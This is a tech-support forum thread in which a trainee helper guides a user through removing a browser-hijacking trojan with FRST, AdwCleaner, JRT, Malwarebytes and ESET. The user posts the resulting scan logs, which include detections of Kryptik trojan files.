HP Documentation (HKLM-x32\...\{3BAA7681-EF42-4FEC-84FC-87BA815492A4}) (Version: 1.2.0.0 - Hewlett-Packard)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7372.4698 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard)
HP System Event Utility (HKLM-x32\...\{C78E8F51-3EAD-4F0C-83F0-EF371075E0B4}) (Version: 1.0.10 - Hewlett-Packard Company)
HP Utility Center (HKLM\...\{891A1782-8B20-4403-8383-458962525926}) (Version: 2.3.4 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
Inst5675 (Version: 8.01.11 - Softex Inc.) Hidden
Inst5676 (Version: 8.01.11 - Softex Inc.) Hidden
Malwarebytes Anti-Malware version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
OEM Application Profile (HKLM-x32\...\{315F1A48-D883-B234-7C79-15873574ACC1}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Panda Devices Agent (HKLM-x32\...\Panda Devices Agent) (Version: 1.03.04 - Panda Security)
Panda Devices Agent (x32 Version: 1.05.00 - Panda Security) Hidden
Panda Free Antivirus (HKLM-x32\...\Panda Universal Agent Endpoint) (Version: 15.01.00.0006 - Panda Security)
Panda Free Antivirus (Version: 7.84.00.0000 - Panda Security) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.232 - Qualcomm Atheros)
Qualcomm Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29075 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 8.24.1218.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7164 - Realtek Semiconductor Corp.)
Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Restore Points =========================
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 23:25 - 2013-08-22 23:25 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {1D1EFFDD-FFEF-41BA-8406-9E014220D816} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-03] (Google Inc.)
Task: {439E8759-4791-4EEA-A839-18CE850C33B7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-03] (Google Inc.)
Task: {5BAB93B1-05E8-4C35-ADE2-2CE61829406C} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2013-08-05] (CyberLink)
Task: {780563C7-45A1-45E2-85FF-2EAFA6B0AC61} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2013-03-13] (CyberLink Corp.)
Task: {B1EA828C-2A31-4235-AD2A-081FDBFFB3B7} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2014-03-07] (CyberLink Corp.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (Whitelisted) ==============
 

 


  • 0

Advertisements


#2
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
Hello, xander291190. Welcome to Geeks to Go! My nickname is Nevan and I will be helping you getting your system back on its electronic feet.

Before we get started, please keep these things in mind:
  • Always read every part of my post carefully. If you don't, you may do something wrong and there could be more problems to solve.
  • If your security programs give you any warnings when using tools I asked you to, don't be afraid. Every tool I provide to you is 100% safe.
  • Only run tools that I ask you to. Some of them can be dangerous to your system as they have much power.
  • You should save or print my instructions. It is possible that we will be using Safe mode, which will cut you off from your internet connection and without access to them, you might be stuck.
  • Malware removal is a complicated process that takes multiple steps to be completed. Don't give up, be patient.
  • The tools we are going to use and your software may cause unwanted interactions. Because of that, I recommend you to make backups of any important files from your machine before proceeding as they might be lost.
  • I recommend you to stay with me until I tell you that we are done. It is important because when your system does not show any bad symptoms anymore it does not mean that it is 100% clean.
  • Your time to reply is limited. If you don't reply within 3 days, your topic will be closed and you will have to request it to be reopened by contacting one of Moderator group members with the link to this topic.
  • Every program I ask you to download should be saved to and run from desktop. If you don't know how to choose the direction of where a download is saved, check this site. You can also just copy these programs to your desktop manually and then run them from there.
  • Remember that the fixes I give you are only for your machine. Using it on other systems may (and probably will) cause problems.
  • Finally, if you have any questions or are unsure about something, just ask. I will not blame you for it. It is better to ask rather than regret it later.
Also, please note that I'm currently in training, so my answers to you will have to be checked first by an experienced helper before I can post them. This can lengthen the time between my answers to you, but in return you will have an extra person reviewing your log.

 
It looks like the Addition.txt you've posted isn't complete. Can you please launch FRST again (make sure that Addition.txt is checked) and post the new logs?

Try attaching them to your post. It may be that the content is too big to fit in one post and that's why it's been cut.
  • 0

#3
xander291190

xander291190

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

Hi Nevan, thanks very much for helping me out!

 

I've run the scan again, i attached the documents this time so hopefully all the information will be there.

Attached Files


  • 0

#4
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
Hello again, xander291190.

A small thing first...

P2P Warning

I've noticed that you have or have had a P2P (Peer-to-Peer) file sharing program on your machine:
  • µTorrent
It is important to stay away from them as they are used to share pirated material. The programs themselves can be safe, but majority of the files shared through them is infected.

Some of things to keep in mind when using P2P programs:
  • Your computer is more likely to get infected with malware, which will result in coming back to our or other forums for help.
  • You may have your important data stolen, including passwords, photos or personal information.
  • You help to share pirated material, which may result in arrest, fines, or even jail time for illegal downloads of copyrighted material.
If I still didn't convince you, please read these short reports about how dangerous it can be to use P2P programs:Whether you remove them or not is your decision. Though I strongly recommend you to uninstall your P2P programs as they most likely will cause problems in the future.

If you choose not to remove them, please refrain from using them until we are done on cleaning your computer.

 
Let's begin the cleaning. Please tell me if this helps with your problem.

Step #1
4rr98tz.png FRST Fix
  • Download attached fixlist.txt file to your desktop.
    Attached File  fixlist.txt   2.53KB   120 downloads
    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
  • Right click FRST64.exe on your desktop and click Run as administrator.
  • Press the Fix button just once and wait.
    NOTE: It's important that both FRST64.exe and fixlist.txt are in the same location or the fix will not work.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished, FRST will generate a log on the desktop (Fixlog.txt). Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
 
Step #2
NFLvzVY.png RogueKiller

Download RogueKiller to your desktop. Make sure to choose RogueKillerX64.exe.
  • Quit all running programs
  • Right click RogueKillerX64.exe and click Run as administrator
  • The program will start the prescan once it's launched. Please wait until it's done and click Scan button.
  • Once the scanning is done, "Scan finished. Please look at the different tabs and check/uncheck needed items before pressing the delete button" message will appear. When it happens, click Report button. The scan log will open.
  • Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
 
Step #3
cnUOkXS.png Farbar Service Scanner
  • Download FSS.exe to your desktop.
  • Right click FSS.exe on your desktop and click Run as administrator.
  • Make sure that all options are checked and click Scan
  • It will create a log (FSS.txt) on the Desktop.
  • Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply
 
EOEdyWG.png Things that should appear in your next post:
  • Fixlog.txt log content
  • RogueKiller log content
  • FSS.txt log content
  • Does that problem with Chrome still appear?

  • 0

#5
xander291190

xander291190

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

Hi again Nevan,

 

Apologies it's taking me a bit of time to get the info you asked for. The virus is taking up a lot of my computers processing speed, so completing the scans without it crashing has been an issue, nearly done now though.

 

Just noticed reading through your advice again, that you mentioned letting you know if there were any further symptoms during the fixing process, a couple have appeared.

 

Firstly it's not just Chrome that is doing it now, Internet Explorer is doing almost exactly the same thing, though it's process' have a different name.

 

Also my chrome now doesn't work at all, and even when i don't try to use it frequently an error message appears. It shows as:

 

'The instruction at 0x08d236b0 referenced at memory 0x000aaea. The memory could not be read. Click OK to terminate the program'

 

I'll have the files uploaded for you shortly, just thought i'd let you know whilst i was waiting for the scan to finish.


  • 0

#6
xander291190

xander291190

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

Hello once more Nevan,

 

Following on form my previous post a little while ago, I've finished the scans that you asked for. I had to attach them as .txt documents instead of copying and pasting them, my computer was having an issue pasting the information, I hope that's alright, sorry for the inconvenience.

 

Good news, the issue seems to have cleared up! Brilliant result!

 

Also i deleted utorrent like you recommended, I reckon that's how the virus got in, so i'll be steering clear of that from now on.

 

Just wanted to say I really appreciate your help mate, this was really stressing me out as i'm off travelling with the laptop very soon and needed it sorted. But you were quick to reply and the help you provided was easy to understand and worked perfectly, so thank you very much!

 

Is there anything else you need from me or need me to do?

Attached Files


  • 0

#7
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
Hello again, xander291190.

I'm glad to hear that the problem is gone. However, we still have some cleaning to do so please stay with me until I tell you that we're done :)

Perform the following instructions.

Step #1
Pw2yAI6.png Windows Repair (All-in-One) Portable
  • Download Windows Repair (All-in-One) Portable to your Desktop and unpack it. (right click the file and click Extract All, then click Extract). A folder named Tweaking.com - Windows Repair will appear.
  • Locate and double-click Repair_Windows.exe to run the program.
  • Click on Repairs tab, untick Automatically do a registry backup and then click Open Repairs.
  • A new window will open with the default options checked. Click the Unselect All button at the bottom of the window. All check marks from all the boxes will disappear.
  • Check the boxes next to the following options:
    • 03 - Reset Service Permissions
    • 06 - Repair Windows Firewall
    • 17 - Repair Windows Updates
    • 26 - Restore Important Windows Services
    • 27 - Set Windows Services To Default Startup
  • Also, check Restart/Shutdown System When Finished and Restart System.
  • Click Start Repairs button.
 
Step #2
INQmTSa.png Junkware Removal Tool
  • Download Junkware Removal Tool to your Desktop
  • Close any open windows
  • Disable your Antivirus program (click here if you don't know how to do this)
  • Double click JRT.exe on your desktop to run it
  • Click any button to start the scan
  • Wait for Junkware Removal Tool to finish the scan
  • When the scan is finished, JRT.txt will be saved to your desktop and it will automatically open
  • Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
 
Step #3
LHBIenm.pngAdwCleaner
  • Close any open windows
  • Double click adwcleaner_5.005.exe you have in your Downloads folder to run it
  • Click the OvD9RYN.png button
  • Wait for AdwCleaner to finish the scan
  • When the scan is finished, there will be "Pending. Please uncheck elements you don't want to remove" message. Leave everything as it is and click 5W2Ci1o.png button.
  • When the cleaning is finished, the program will ask you to reboot the system. Please do so.
  • Once your machine has rebooted, a Notepad window will be opened. If it won't, you can find it in C:\AdwCleaner. The report will be saved as AdwCleaner[C2].txt.
  • Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
Remember to enable your Antivirus program once you're done!

Also, please open the old AdwCleaner log file from C:\AdwCleaner\AdwCleaner[C1].txt and post it's content here.

 
Step #4
cnUOkXS.png Farbar Service Scanner
  • Right click FSS.exe on your desktop and click Run as administrator.
  • Make sure that all options are checked and click Scan
  • It will create a log (FSS.txt) on the Desktop.
  • Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply
 
EOEdyWG.png Things that should appear in your next post:
  • JRT.txt log content
  • AdwCleaner[C1].txt log content
  • AdwCleaner[C2].txt log content
  • FSS.txt log content

  • 0

#8
xander291190

xander291190

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

Hi,

 

No problem, I'll wait until you say it's all good :)

 

Here's the scan results:

 

JRT:

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 7.6.0 (08.31.2015:1)
OS: Windows 8.1 Connected x64
Ran by user on Sun 06/09/2015 at  2:32:29.90
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
~~~ Services
 
 
 
~~~ Tasks
 
 
 
~~~ Registry Values
 
 
 
~~~ Registry Keys
 
 
 
~~~ Files
 
 
 
~~~ Folders
 
 
 
~~~ Chrome
 
 
[C:\Users\user\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - default search provider reset
 
[C:\Users\user\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - Extensions Deleted:
 
[C:\Users\user\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - default search provider reset
 
[C:\Users\user\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - Extensions Deleted:
[]
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sun 06/09/2015 at  2:38:15.71
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
ADWCleaner C1:
 
# AdwCleaner v5.005 - Logfile created 03/09/2015 at 02:04:40
# Updated 31/08/2015 by Xplode
# Database : 2015-08-31.2 [Server]
# Operating system : Windows 8.1 Connected  (x64)
# Username : user - HP
# Running from : C:\Users\user\Downloads\adwcleaner_5.005.exe
# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
[-] Folder Deleted : C:\Program Files (x86)\GSafe
[-] Folder Deleted : C:\Users\user\AppData\Local\Temp\GSafe
 
***** [ Files ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Web browsers ] *****
 
[-] [C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : vlc-media-player.en.softonic.com
 
*************************
 
:: Winsock settings cleared
 
########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [855 bytes] ##########
 
ADWCleaner C2:
 
# AdwCleaner v5.005 - Logfile created 06/09/2015 at 03:37:33
# Updated 31/08/2015 by Xplode
# Database : 2015-09-04.4 [Server]
# Operating system : Windows 8.1 Connected  (x64)
# Username : user - HP
# Running from : C:\Users\user\Downloads\adwcleaner_5.005.exe
# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
 
***** [ Files ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Web browsers ] *****
 
 
*************************
 
:: Winsock settings cleared
 
########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [606 bytes] ##########
 
FSS:
 
Farbar Service Scanner Version: 26-07-2015
Ran by user (administrator) on 06-09-2015 at 03:53:25
Running from "C:\Users\user\Downloads"
Microsoft Windows 8.1 with Bing  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Action Center:
============
 
 
Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is set to Demand. The default start type is Auto.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.
 
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is OK.
The ImagePath of WinDefend: ""%ProgramFiles%\Windows Defender\MsMpEng.exe"".
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****

 


  • 0

#9
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
Hello again, xander291190.
 

No problem, I'll wait until you say it's all good :)

:thumbsup:

Let's continue.

Step #1
4krSzoc.png Registry repair

Download the attached .reg files to your Desktop.
Attached File  WinDefend.reg   7KB   47 downloads
Attached File  wuauserv.reg   6.86KB   54 downloads

Launch the files by double-clicking them Allow the files to be added to the registry.
Once you're done, restart your system.

 
Step #2
cnUOkXS.png Farbar Service Scanner
  • Right click FSS.exe on your desktop and click Run as administrator.
  • Make sure that all options are checked and click Scan
  • It will create a log (FSS.txt) on the Desktop.
  • Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply
 
Step #3
JHlUMFt.png Malwarebytes Anti-Malware

I can see that you currently have Malwarebytes Anti-Malware installed on your computer. We'll use it.
  • Launch Malwarebytes Anti-Malware
  • In Database version section, click Update Now
  • Once the update is done, click Settings>Detection and Protection
  • Make sure that all three boxes under Detection Options are checked
    vG7pLOy.png
  • Go back to Dashboard and click the big, green Scan Now button.
  • Wait for Malwarebytes Anti-Malware to finish the scan
  • If the program will detect anything, click Remove Selected. The program might want to reboot the system. Allow it it wants to.
  • Once the deletion is done (or after reboot), go to History, select Application Logs and click the latest Scan Log.
  • Click Export, then click Copy to Clipboard.
  • Paste (CTRL+V) the log into your next reply.
 
Step #4
jyv2Te8.png ESET Online Scanner
  • Note: This step can only be done using Internet Explorer, Google Chrome or Mozilla Firefox
  • Disable your Antivirus program (click here if you don't know how to do this).
  • Visit ESET site
  • Click RYa1k8g.png
  • When using:
    • Internet Explorer:
      • Accept the Terms of Use and click Start
      • Allow the running of add-on
    • Other browsers:
      • Download esetsmartinstaller_enu.exe that you'll be given link to
      • Double click esetsmartinstaller_enu.exe
      • Allow the Terms of Use and click Start
  • Make sure that the options are set as the example below:
    temh2Om.png
  • Click Start
  • The program will begin to download it's virus database. The speed may vary depending on your Internet connection.
  • When completed, the program will begin to scan. This may take several hours. Please, be patient.
  • Do not do anything on your machine as it may interrupt the scan
  • When the scan is done, click Finish
  • A log.txt file will be created at C:\Program Files (x86)\ESET\ESET Online Scanner. Open it using Notepad.
  • Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
Remember to enable your Antivirus program once you're done!

 
EOEdyWG.png Things that should appear in your next post:
  • FSS.txt log content
  • Malwarebytes Anti-Malware log content
  • ESET Online Scanner log content

  • 0

#10
xander291190

xander291190

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

Here we go.

 

FSS:

 

Farbar Service Scanner Version: 26-07-2015
Ran by user (administrator) on 06-09-2015 at 09:29:40
Running from "C:\Users\user\Downloads"
Microsoft Windows 8.1 with Bing  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Action Center:
============
 
 
Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is set to Demand. The default start type is Auto.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.
 
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is OK.
The ImagePath of WinDefend service is OK.
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****
 
MalwareBytes:
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 6/09/2015
Scan Time: 9:32 AM
Logfile: MalwareBytes.txt
Administrator: Yes
 
Version: 2.1.8.1057
Malware Database: v2015.09.05.07
Rootkit Database: v2015.08.16.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled
 
OS: Windows 8.1
CPU: x64
File System: NTFS
User: user
 
Scan Type: Threat Scan
Result: Cancelled
Objects Scanned: 0
(No malicious items detected)
Time Elapsed: 0 min, 36 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
[email protected] as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=9b95a216f1e7ab4aa0efb9290f3ec81f
# end=init
# utc_time=2015-09-06 12:13:44
# local_time=2015-09-06 10:13:44 (+1000, AUS Eastern Standard Time)
# country="Australia"
# osver=6.2.9200 NT 
[email protected] as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=9b95a216f1e7ab4aa0efb9290f3ec81f
# end=init
# utc_time=2015-09-06 12:27:53
# local_time=2015-09-06 10:27:53 (+1000, AUS Eastern Standard Time)
# country="Australia"
# osver=6.2.9200 NT 
Update Init
Update Download
Update Finalize
Updated modules version: 25622
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=9b95a216f1e7ab4aa0efb9290f3ec81f
# end=updated
# utc_time=2015-09-06 12:30:43
# local_time=2015-09-06 10:30:43 (+1000, AUS Eastern Standard Time)
# country="Australia"
# osver=6.2.9200 NT 
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=9b95a216f1e7ab4aa0efb9290f3ec81f
# engine=25622
# end=finished
# remove_checked=true
# archives_checked=false
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2015-09-06 01:40:42
# local_time=2015-09-06 11:40:42 (+1000, AUS Eastern Standard Time)
# country="Australia"
# lang=1033
# osver=6.2.9200 NT 
# compatibility_mode_1='Panda Free Antivirus'
# compatibility_mode=1557 16777213 87 100 463100 227703216 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 32329 14790007 0 0
# scanned=214727
# found=207
# cleaned=207
# scan_time=4198
sh=802757863B6651E4DAC09CAAD92462343715C7FE ft=1 fh=2ea60577d4105f61 vn="a variant of Win32/Kryptik.DVSV trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\ProgramData\msbogj.exe.xBAD"
sh=AC87535F09FFEE83B3198F186A68B9248C7980F6 ft=1 fh=2ed57a37f4829cc6 vn="a variant of Win32/Kryptik.DUHI trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\Ufrmedia\crypted"
